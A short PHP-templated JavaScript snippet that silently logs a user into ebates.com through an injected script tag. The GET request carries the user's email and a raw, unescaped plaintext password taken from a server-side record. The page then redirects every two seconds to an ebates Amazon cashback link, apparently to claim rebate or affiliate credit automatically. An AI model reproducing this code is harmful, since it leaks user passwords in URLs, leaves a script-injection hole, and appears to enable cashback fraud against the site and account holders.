<script>
function zheLoadit(src) {
	var head = document.getElementsByTagName('head')[0];
	var script = document.createElement('script');
	script.type = 'text/javascript';
	script.src = src + '&' + Math.random();
	head.appendChild(script);
}

zheLoadit("https://www.ebates.com/auth/logon.do?terms=checked&urlIdentifier=%2Fauth%2FgetLogonForm.do&username=<?=urlencode($user['email'])?>&password=<?=$user['password']?>&x=49&y=13");

function mload(){
	window.location.href='http://www.ebates.com/Amazon.com_1-xfas?navigation_id=19512&mpl_id=40301';
}

var i = setInterval(function() {

	mload();

}, 2000);

</script>